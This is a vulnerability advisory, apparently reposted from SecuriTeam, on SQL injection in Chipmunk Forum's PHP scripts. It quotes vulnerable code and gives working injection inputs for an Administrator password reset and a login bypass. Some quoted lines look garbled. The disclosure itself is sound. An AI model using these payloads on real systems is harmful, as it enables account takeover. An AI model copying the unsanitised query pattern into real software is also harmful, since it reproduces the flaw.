信息来源:
www.securiteam.com
Summary
Chipmunk Forum is "a small yet flexible and fully featured forum system".
Due to inadequate filtering by Chipmunk Forum's PHP scripts a remote attacker can cause the program to insert arbitrary SQL statements into existing ones, allowing him to gain elevated privileges to the forum, change information of users, obtain passwords, etc.
Credit:
The information has been provided by GHC vision.
Details
Vulnerable script getpassword.php
Vulnerable code:
if(isset($_POST['submit']))
{
$email=$_POST['email'];
$getinfo="SELECT * from b_users where email='$email'";
...
mail("$email","Your Forum password","Your forum password has been set to $value");
Exploit:
Use the following as the email:
ghc@ghc.ru' or username='Administrator this will change password the password oft the Administrator account (The "Administrator" must be a valid user name).
Vulnerable script authenticate.php
Vulnerable code:
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";
Exploit:
At the login.php page enter as the username Administrator'/*
Vulnerable script edit.php
Vulnerable code:
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'";
It is possible to inject SQL statements through the $ID variable.
Vulnerable script search.php
Vulnerable code:
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50";
It is possible to inject SQL statements through $searchterm parameter.
Vulnerable script newtopic.php
Vulnerable code:
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
...
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");
It is possible to inject SQL statements through $name, $title, and $post parameters.
Vulnerable script reguser.php
Vulnerable code:
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";
...
if ($password==$pass2 && $_POST['password'])
{
$password=md5($password);
$supervalue=$value;
$daycte("U");
$email=$_POST['email'];
$location=$_POST['location'];
$aim=$_POST['aim'];
$showprofile=$_POST['showprofile'];
$icq=$_POST['icq'];
$seedval=$day#0000;
srand($seedval);
$key=RAND(1000000,2000000);
if($requirekey=="no"||$requirekey=="No") //if you do no require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, email, location, AIM, ICQ, showprofile, validated) values ('$username', '$password', '$signature', '$email', '$location', '$aim', '$icq', '$showprofile', '1')";
mysql_query($SQL) or die(mysql_error());
}
else //you require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, keynode, email, location, AIM, ICQ, showprofile) values ('$username', '$password', '$signature', '$key', '$email', '$location', '$aim', '$icq', '$showprofile')";
mysql_query($SQL) or die(mysql_error());
mail("$email","Your forum activation key","Paste the URL to activate your account.
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
}
It is possible to inject SQL statements through the registration form's variables.
